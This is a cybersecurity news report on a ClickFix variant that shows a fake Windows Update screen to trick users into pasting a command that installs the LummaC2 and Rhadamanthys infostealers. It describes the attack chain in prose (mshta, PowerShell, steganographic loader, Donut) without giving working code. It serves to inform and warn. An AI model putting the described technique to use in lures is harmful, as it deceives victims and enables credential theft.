Threat actors have recently adapted the ClickFix attack model, employing a deceptive tactic that disguises malicious code within a convincing yet fraudulent Windows Update screen. This screen, characterized by its bright blue background and white lettering, mimics the familiar Windows Update interface. According to Huntress security researchers Ben Folland and Anna Pham, this new variant presents a full-screen display that features realistic “Working on updates” animations. Ultimately, it prompts users to follow the standard ClickFix procedure: opening the Run prompt (Win+R) and pasting a malicious command.
Executing this command initiates a series of actions that lead to the installation of LummaC2 and Rhadamanthys info-stealing malware. The ClickFix model, a relatively recent yet increasingly prevalent social engineering scam, tricks victims into executing harmful commands on their systems. This process not only facilitates malware deployment, including ransomware, but also enables cybercriminals to circumvent existing security measures.
Rapid Rise in ClickFix Campaigns
In a report released in June, cybersecurity firm ESET highlighted a significant surge in ClickFix attacks, noting a staggering increase of over 500% compared to the latter half of 2024. This alarming trend has positioned ClickFix as one of the most rapidly escalating threats, accounting for nearly 8% of all blocked attacks in the first half of 2025, making it the second most common attack vector after phishing. Jiří Kropáč, director of ESET’s Threat Prevention Labs, remarked on the expanding list of threats associated with ClickFix, which now includes infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware linked to nation-state actors.
Dropping LummaC2, Rhadamanthys Infostealers
In their investigation, Huntress researchers tracked two ClickFix lures that utilized a steganographic loader to deliver the info-stealing malware, LummaC2 and Rhadamanthys. These steganographic ClickFix scams conceal malicious software within the pixel data of image files, aiming to deceive users into executing harmful commands. One variant employed a human verification page as bait, while the other utilized the Windows Update interface.
Looks Like the Real Thing
Since early October, the researchers have been monitoring several ClickFix clusters that leverage the Windows Update ruse to convince users that a legitimate update cycle is underway. The screen fills the entire display, showcasing a “genuine-looking Windows Update screen” complete with instructions urging users not to turn off their computers during the update process. At the conclusion of this faux update, users are prompted to follow the familiar Win+R & Ctrl+V sequence to paste the malicious command.
The execution chain mirrors that of the human verification variant, beginning with an mshta.exe command containing a URL with a hex-encoded second octet. This leads to the execution of PowerShell, which dynamically decrypts and loads a reflective .NET assembly, ultimately injecting another .NET assembly for process injection. The shellcode injected into the target process is extracted using steganography.
Finding the Payloads
The infostealer malware is extracted from the image and processed through a Donut coding tool, facilitating in-memory execution of VBScript, JScript, EXE, DLL files, and .NET assemblies. Utilizing a donut-decryptor tool, researchers identified the malicious payloads as LummaC2 and Rhadamanthys infostealers. Earlier this month, European law enforcement agencies dismantled the infrastructure used by threat actors to deploy various malware families, including Rhadamanthys, as part of the ongoing international Operation Endgame. Folland and Pham noted that their research was conducted both before and after this law enforcement action, revealing that Rhadamanthys is no longer being distributed through the fraudulent Windows Update campaign.
While the use of steganography enhances the ability of these payloads to evade signature-based detection and complicates analysis, the attacks fundamentally rely on a straightforward delivery mechanism: the victim manually opening the Windows Run box to paste a malicious command.
